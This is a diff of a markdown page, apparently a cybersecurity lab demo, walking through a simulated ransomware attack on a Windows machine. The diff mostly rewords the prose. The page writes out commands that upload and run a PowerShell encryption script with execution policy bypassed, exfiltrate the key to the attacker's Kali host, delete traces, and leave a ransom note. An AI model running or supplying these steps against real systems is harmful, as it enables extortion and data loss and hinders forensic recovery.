EnricoPiccin02/Cybersecurity-Demo/home.md

 Write-Host "Encryption complete.
 Files are now unreadable."
 ```
-This script needs to be uploaded into an adversary-chosen location on the victim's platform:
+This script must be uploaded to an adversary-selected location on the victim’s platform:
 ```
 upload /home/kali/Desktop/encrypt.ps1 C:\\Users\\enrico\\Documents\\encrypt.ps1
 ```
-and then executed:
+and subsequently executed:
 ```
 execute -f powershell.exe -a "-ExecutionPolicy Bypass -File C:\\Users\\enrico\\Documents\\encrypt.ps1"
 ```
-To avoid leaving traces, I also exfiltrate the encryption/decryption key
+To minimise the likelihood of leaving traces, I also exfiltrate the encryption/decryption key:
 ```
-download -r C:\\Users\\enrico\\Documents\\encryption_key.bin /home/kali/Desktop/Exfiltrated
+download C:\\Users\\enrico\\Documents\\encryption_key.bin /home/kali/Desktop/Exfiltrated
 ```
-and remove from the victims machine both the key and the Powershell script:
+and remove both the key and the Powershell script from the victim’s machine:
 ```
-rm C:\\Users\\enrico\\Documents\\encrypt.ps1"
+rm C:\\Users\\enrico\\Documents\\encryption_key.bin
-rm C:\\Users\\enrico\\Documents\\encryption_key.bin"
+rm C:\\Users\\enrico\\Documents\\encrypt.ps1
 ```
-To inform the victim of the compromise and demand a ransom, I leave the following message as a `README.txt` file inside the disrupted folder:
+To inform the victim of the compromise and demand a ransom, I leave the following message as a `README.txt` file within the disrupted folder:
 ```
 execute -f cmd.exe -a "/c echo Your files have been encrypted.
-Contact your.worst.enemy@pj5.w49ol.ru to recover them. > C:\\Users\\enrico\\Documents\\README.txt"
+Contact your.worst.enemy@pj5.w49ol.ru to recover them. > C:\\Users\\enrico\\Desktop\\Very_Important_Stuff\\README.txt"
 ```

 ![Photo of Mountain](images/mountain.jpg)